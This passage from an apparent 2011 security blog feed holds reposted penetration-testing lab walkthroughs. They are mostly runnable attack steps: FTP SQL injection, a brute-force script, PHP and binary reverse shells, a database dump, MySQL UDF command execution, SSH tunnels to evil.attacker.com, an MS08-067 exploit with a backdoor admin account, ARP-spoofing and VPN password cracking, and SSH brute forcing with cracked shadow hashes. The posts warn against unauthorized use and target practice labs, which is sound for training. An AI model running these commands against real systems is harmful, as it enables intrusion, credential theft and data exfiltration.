&lt;iframe src="http://player.vimeo.com/video/11213607?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="700" height="500" frameborder="0" webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/11213607"&gt;Penetration Testing in the Real World&lt;/a&gt; from &lt;a href="http://vimeo.com/offsec"&gt;Offensive Security&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;
&lt;b&gt;ftp-brute.py&lt;/b&gt;&lt;br /&gt;
&lt;code&gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
from ftplib import FTP&lt;br /&gt;
print "Attempting user Directory Discover via FTP"&lt;br /&gt;
for i in range(0,6):&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; --&amp;nbsp;&amp;nbsp;"&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;password=str("1")&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ftp=FTP('www.offseclabs.com')&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ftp.login(username,password)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;print "Logged in as user "+str(i)+",1"&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ftp.retrlines('LIST')&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;ftp.close()&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&lt;br /&gt;
Open Terminal A :&lt;br /&gt;
&lt;br /&gt;
nmap -p 21,80 www.offseclabs.com&lt;br /&gt;
nc -v www.offseclabs.com 80&lt;br /&gt;
HEAD / HTTP/1.0&lt;br /&gt;
(To enumerate the webserver)&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
ftp www.offseclabs.com&lt;br /&gt;
username - bob&lt;br /&gt;
password - bob&lt;br /&gt;
(To enumerate the ftp server)&lt;br /&gt;
&lt;br /&gt;
ftp www.offseclabs.com&lt;br /&gt;
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --&amp;nbsp;&amp;nbsp;&lt;br /&gt;
password - 1&lt;br /&gt;
&lt;br /&gt;
(logged in to the ftp server)&lt;br /&gt;
pwd&lt;br /&gt;
ls&lt;br /&gt;
bye&lt;br /&gt;
&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
cd core&lt;br /&gt;
clear&lt;br /&gt;
nano brute.py --&amp;gt; (see above ftp-brute.py)&lt;br /&gt;
./brute.py&lt;br /&gt;
(get the fifth user who has mapped to the root directory of webserver)&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
ftp www.offseclabs.com&lt;br /&gt;
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --&amp;nbsp;&amp;nbsp;&lt;br /&gt;
password - 1&lt;br /&gt;
&lt;br /&gt;
(logged in as the fifth user)&lt;br /&gt;
ls&lt;br /&gt;
put rs.php --&amp;gt; (a reverse php shell)&lt;br /&gt;
&lt;br /&gt;
-----------------------&lt;br /&gt;
Open Terminal B :&lt;br /&gt;
&lt;br /&gt;
nc -lvp 80&lt;br /&gt;
&lt;br /&gt;
-----------------------&lt;br /&gt;
Open Terminal C :&lt;br /&gt;
&lt;br /&gt;
wget www.offseclabs.com/rs.php&lt;br /&gt;
&lt;br /&gt;
(Then, at Terminal B, we got a reverse shell)&lt;br /&gt;
&lt;br /&gt;
-----------------------&lt;br /&gt;
Go back to Terminal B :&lt;br /&gt;
(inside the reverse shell)&lt;br /&gt;
&lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
pwd&lt;br /&gt;
cd /var/www&lt;br /&gt;
ls -la&lt;br /&gt;
cd includes&lt;br /&gt;
cat configure.php&lt;br /&gt;
(get the MySQL username and password as well as MySQL server address and database name)&lt;br /&gt;
&lt;br /&gt;
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce &gt; /var/www/images/ccdump.txt&lt;br /&gt;
&lt;br /&gt;
------------------------&lt;br /&gt;
Open a Firefox :&lt;br /&gt;
&lt;br /&gt;
www.offseclabs.com/images/ccdump.txt&lt;br /&gt;
(we got the database dump)&lt;br /&gt;
&lt;br /&gt;
-------------------------&lt;br /&gt;
Go back to Terminal A :&lt;br /&gt;
&lt;br /&gt;
(inside the ftp server)&lt;br /&gt;
put up.html --&amp;gt; (file upload html file)&lt;br /&gt;
put up.php -- &amp;gt; (file upload php file)&lt;br /&gt;
&lt;br /&gt;
-------------------------&lt;br /&gt;
Open Firefox :&lt;br /&gt;
&lt;br /&gt;
www.offseclabs.com/up.html&lt;br /&gt;
&lt;br /&gt;
(upload lib_mysqludf_sys.so and marked it as 1)&lt;br /&gt;
(upload rs [a binary reverse shell) and marked it as 2)&lt;br /&gt;
&lt;br /&gt;
** Details of &lt;a href="http://www.mysqludf.org/lib_mysqludf_sys/index.php"&gt;lib_mysqludf_sys.so&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
---------------------------&lt;br /&gt;
Go back to Terminal A :&lt;br /&gt;
&lt;br /&gt;
(quit the ftp server)&lt;br /&gt;
bye&lt;br /&gt;
clear&lt;br /&gt;
exit&lt;br /&gt;
(quit Terminal A)&lt;br /&gt;
&lt;br /&gt;
----------------------------&lt;br /&gt;
Go back to Terminal B :&lt;br /&gt;
&lt;br /&gt;
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5&lt;br /&gt;
(login to MySQL server)&lt;br /&gt;
use pwn;&lt;br /&gt;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';&lt;br /&gt;
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';&lt;br /&gt;
&lt;br /&gt;
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';&lt;br /&gt;
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';&lt;br /&gt;
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';&lt;br /&gt;
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';&lt;br /&gt;
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';&lt;br /&gt;
&lt;br /&gt;
SELECT sys_eval('chmod 755 /tmp/bd');&lt;br /&gt;
SELECT sys_eval('/tmp/bd &amp;');&lt;br /&gt;
(don't press Enter at this moment)&lt;br /&gt;
&lt;br /&gt;
---------------------------&lt;br /&gt;
Open Terminal D :&lt;br /&gt;
&lt;br /&gt;
nc -lvp 80&lt;br /&gt;
&lt;br /&gt;
(go back to Terminal B and press enter, you will get reserver shell at Terminal D)&lt;br /&gt;
&lt;br /&gt;
----------------------------&lt;br /&gt;
Open Terminal E :&lt;br /&gt;
&lt;br /&gt;
nc -lvp 80&lt;br /&gt;
&lt;br /&gt;
----------------------------&lt;br /&gt;
Go back to Terminal B :&lt;br /&gt;
&lt;br /&gt;
(inside the MySQL server)&lt;br /&gt;
SELECT sys_eval('/tmp/bd &amp;');&lt;br /&gt;
&lt;br /&gt;
(press enter and we got another reverse shell at Terminal E)&lt;br /&gt;
&lt;br /&gt;
---------------------------&lt;br /&gt;
Go back to Terminal E :&lt;br /&gt;
&lt;br /&gt;
(inside the reverse shell)&lt;br /&gt;
ping -c 1 10.150.0.20&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com&lt;br /&gt;
(create a remote tunnel at port 445)&lt;br /&gt;
&lt;br /&gt;
-----------------------------&lt;br /&gt;
Open Terminal F :&lt;br /&gt;
&lt;br /&gt;
netstat antp&lt;br /&gt;
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse&lt;br /&gt;
&lt;br /&gt;
-----------------------------&lt;br /&gt;
Go back to Terminal D :&lt;br /&gt;
&lt;br /&gt;
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com&lt;br /&gt;
(create a remote tunnel at port 4444)&lt;br /&gt;
&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
------------------------------&lt;br /&gt;
Go back to Terminal F :&lt;br /&gt;
&lt;br /&gt;
cd core&lt;br /&gt;
nano nx.py --&amp;gt; (a ms08-067 python exploit for win2k3 sp2)&lt;br /&gt;
clear&lt;br /&gt;
./nx.py 127.0.0.1&lt;br /&gt;
nc -v 127.0.0.1 4444&lt;br /&gt;
&lt;br /&gt;
(we got a remote shell of 10.150.0.20)&lt;br /&gt;
ip config&lt;br /&gt;
net user hacker hacker /add&lt;br /&gt;
net localgroup administrators hacker /add&lt;br /&gt;
&lt;br /&gt;
---------------------------------&lt;br /&gt;
Go back to Terminal D :&lt;br /&gt;
&lt;br /&gt;
(quit the tunnel)&lt;br /&gt;
exit&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com&lt;br /&gt;
(create another remote tunnel on port 3389)&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
-----------------------------------&lt;br /&gt;
Open Terminal G :&lt;br /&gt;
&lt;br /&gt;
netstat -antp | grep LISTEN&lt;br /&gt;
clear&lt;br /&gt;
rdesktop 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
(login to the 10.150.0.20 with username - hacker and password - hacker)&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1685485982442128037?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1685485982442128037'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1685485982442128037'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-penetration-testing-in-real-world.html' title='HOWTO : Penetration Testing in the Real World'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1089835231477735659</id><published>2011-09-12T01:02:00.000+08:00</published><updated>2011-09-12T01:02:00.565+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='g0tmi1k'/><title type='text'>g0tmi1k's Video Series</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The following are my collections :&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-cracking-pptp-vpns-with-asleap.html"&gt;HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-de-icenet-v10-1100-level-1-disk-1.html"&gt;HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-de-icenet-v11-1110-level-1-disk-2.html"&gt;HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-de-icenet-v20-1100-level-2-disk-1.html"&gt;HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-pwnos.html"&gt;HOWTO : pWnOS&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-de-icenet-v12a-120a-level-1-disk.html"&gt;HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-de-icenet-v12b-120b-level-1-disk.html"&gt;HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-kioptrix-level-1.html"&gt;HOWTO : Kioptrix - Level 1&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-kioptrix-level-11.html"&gt;HOWTO : Kioptrix - Level 1.1&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-kioptrix-level-12.html"&gt;HOWTO : Kioptrix - Level 1.2&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-holynix-level-1.html"&gt;HOWTO : Holynix - Level 1&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-holynix-level-2.html"&gt;HOWTO : Holynix - Level 2&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1089835231477735659?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1089835231477735659'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1089835231477735659'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/g0tmi1ks-video-series.html' title='g0tmi1k&apos;s Video Series'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-2293303148797216114</id><published>2011-09-12T00:41:00.002+08:00</published><updated>2011-09-12T00:41:38.327+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='asleep'/><category scheme='http://www.blogger.com/atom/ns#' term='THC-pptp-bruter'/><category scheme='http://www.blogger.com/atom/ns#' term='chap2asleap.py'/><title type='text'>HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-videos/2347-%5Bvideo%5D-cracking-vpns-asleap-thc-pptp-bruter.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://g0tmi1k.blip.tv/file/3356422"&gt;Watch on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?qy4qqqk69ewzuqx"&gt;Download Video&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?wnkoyiai2ty"&gt;Script (chap2asleap.py)&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is this?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.&lt;br /&gt;
&lt;br /&gt;
This video demostrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How does this work?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
From wireshark (and a Man In The Middle attack), you can get "CHAP Challenge" and "CHAP Response". We can break theses values down:&lt;br /&gt;
&lt;br /&gt;
CHAP Challenge = Auth Challenge (16 bytes)&lt;br /&gt;
CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes)&lt;br /&gt;
&lt;br /&gt;
After finding "Auth Challenge and Peer Challenge" we can add these to the username and hash (sha1)the result. This will generate the "Challenge".&lt;br /&gt;
&lt;br /&gt;
Once we have the challenge, we can feed this into the asleap, along with CHAP Challenge.&lt;br /&gt;
&lt;br /&gt;
This script does all the work for you (and more), it just needs the values from wireshark for it to work. As well as having the option for different styles of attack, you can either uses a dictionary/wordlist or use 'Genkeys' to generate a look up file for asleap (which is recommended). Also by using this, you can automatically run asleap with your arguments.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
asleap&lt;br /&gt;
Python&lt;br /&gt;
The script - chap2asleap.py&lt;br /&gt;
Wireshark&lt;br /&gt;
VPN&lt;br /&gt;
THC-pptp-bruter&lt;br /&gt;
&lt;br /&gt;
Software&lt;br /&gt;
Name: asleap&lt;br /&gt;
Version: 2.2&lt;br /&gt;
Home Page: http://www.willhackforsushi.com/Asleap.html&lt;br /&gt;
Download Link: http://www.willhackforsushi.com/code/asleap/2.2/asleap-2.2.tgz&lt;br /&gt;
&lt;br /&gt;
Name: THC-pptp-bruter&lt;br /&gt;
Version: 0.1.4&lt;br /&gt;
Home Page: http://freeworld.thc.org&lt;br /&gt;
Download Link: http://freeworld.thc.org/download.php?t=r&amp;f=thc-pptp-bruter-0.1.4.tar.gz&lt;br /&gt;
&lt;br /&gt;
Name: chap2asleap.py&lt;br /&gt;
Version: 0.1.1&lt;br /&gt;
Home Page: http://g0tmi1k.blogspot.com&lt;br /&gt;
Download Link: http://www.mediafire.com/?wnkoyiai2ty&lt;br /&gt;
&lt;br /&gt;
How to use chap2asleap.py:&lt;br /&gt;
1.) chmod 755 chap2asleap.py&lt;br /&gt;
2.) python chap2asleap.py&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;echo 1 &gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
&lt;br /&gt;
arpspoof -i eth1 -t 10.0.0.3 10.0.0.9&lt;br /&gt;
&lt;br /&gt;
arpspoof -i eth1 -t 10.0.0.9 10.0.0.3&lt;br /&gt;
&lt;br /&gt;
wireshark -i eth1 -k&lt;br /&gt;
&lt;br /&gt;
python chap2asleap.py&lt;br /&gt;
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v&lt;br /&gt;
&lt;br /&gt;
cd /pentest/passwords/wordlists&lt;br /&gt;
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-2293303148797216114?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2293303148797216114'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/2293303148797216114'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-cracking-pptp-vpns-with-asleap.html' title='HOWTO : Cracking PPTP VPNs with asleap and THC-pptp-bruter'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-7480966745665771285</id><published>2011-09-12T00:28:00.000+08:00</published><updated>2011-09-12T00:28:08.217+08:00</updated><title type='text'>HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-videos/1662-%5Bvideo%5D-de-ice-net-v1-1-1-100-%7Blevel-1-disk-2%7D.html"&gt;here&lt;/a&gt;    &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://g0tmi1k.blip.tv/file/3194722"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?994f2o5ekdqqpzm"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is this?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.&lt;br /&gt;
&lt;br /&gt;
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
BackTrack 4 (Final)&lt;br /&gt;
de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)&lt;br /&gt;
Dictionary(s)&lt;br /&gt;
&lt;br /&gt;
Software&lt;br /&gt;
Name: De-ICE.net&lt;br /&gt;
Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)&lt;br /&gt;
Home Page: http://www.de-ice.net or http://heorot.net/livecds/&lt;br /&gt;
&lt;br /&gt;
Download Link:&lt;br /&gt;
http://www.mediafire.com/?bfo9b21g2m69tb6&lt;br /&gt;
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso&lt;br /&gt;
&lt;br /&gt;
Forums/Support: http://forums.heorot.net andhttp://forums.heorot.net/viewtopic.php?f=16&amp;amp;t=13&lt;br /&gt;
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nmap -n 192.168.1.1-255&lt;br /&gt;
&lt;br /&gt;
nmap -n -sS -sV -O 192.168.1.100&lt;br /&gt;
&lt;br /&gt;
firefox 192.168.1.100&lt;br /&gt;
&lt;br /&gt;
[+]kate -&gt; make list of possible usernames. Save. Filename: usernames&lt;br /&gt;
// lastF, fLast&lt;br /&gt;
&lt;br /&gt;
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s&lt;br /&gt;
&lt;br /&gt;
ssh bbanter@192.168.1.100&lt;br /&gt;
// "Yes" if quiz about trusting authenticity. Password: bbanter&lt;br /&gt;
&lt;br /&gt;
cd /etc/&lt;br /&gt;
&lt;br /&gt;
cat passwd&lt;br /&gt;
&lt;br /&gt;
[+]kate -&gt; Update usernames. Save.&lt;br /&gt;
&lt;br /&gt;
cat group&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
cd /root/tools/dictionary/&lt;br /&gt;
&lt;br /&gt;
cat common-1 common-2 common-3 common-4 wordlist.txt &gt;&gt; /root/passwords&lt;br /&gt;
&lt;br /&gt;
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords&lt;br /&gt;
&lt;br /&gt;
ssh aadams@192.168.1.100&lt;br /&gt;
// Password: nostradamus&lt;br /&gt;
&lt;br /&gt;
cd /etc/&lt;br /&gt;
&lt;br /&gt;
sudo cat shadow&lt;br /&gt;
// Password: nostradamus&lt;br /&gt;
&lt;br /&gt;
[+]kate -&gt; New -&gt; Paste -&gt; Save. Filename: shadow&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
john&lt;br /&gt;
&lt;br /&gt;
./john --rules --wordlist=/root/passwords --users=root /root/shadow&lt;br /&gt;
// Password: tarot&lt;br /&gt;
&lt;br /&gt;
ssh aadams@192.168.1.100&lt;br /&gt;
// Password: nostradamus&lt;br /&gt;
&lt;br /&gt;
su&lt;br /&gt;
// Password: tarot&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd ..&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd ftp&lt;br /&gt;
/&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd incoming/&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot&lt;br /&gt;
&lt;br /&gt;
cd /etc/&lt;br /&gt;
&lt;br /&gt;
vi vsftpd.conf&lt;br /&gt;
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)&lt;br /&gt;
&lt;br /&gt;
modprobe capability&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
ftp 192.168.1.100&lt;br /&gt;
// User: root. Password: tarot&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd ..&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd home&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd ftp&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd incoming&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
get salary.csv&lt;br /&gt;
&lt;br /&gt;
cd /pentest/passwords/jtr&lt;br /&gt;
&lt;br /&gt;
ls&lt;br /&gt;
&lt;br /&gt;
mv salary.csv ~&lt;br /&gt;
&lt;br /&gt;
[+]kate -&gt; salary.csv&lt;br /&gt;
&lt;br /&gt;
// GAME OVER&lt;br /&gt;
&lt;br /&gt;
----------------------------------------------------------------------------------------------------&lt;br /&gt;
Users&lt;br /&gt;
root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::&lt;br /&gt;
aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::&lt;br /&gt;
bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::&lt;br /&gt;
ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::&lt;br /&gt;
----------------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-7480966745665771285?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7480966745665771285'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/7480966745665771285'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-de-icenet-v10-1100-level-1-disk-1.html' title='HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-661479759369421009</id><published>2011-09-12T00:21:00.002+08:00</published><updated>2011-09-12T00:21:40.658+08:00</updated><title type='text'>HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}</title><content 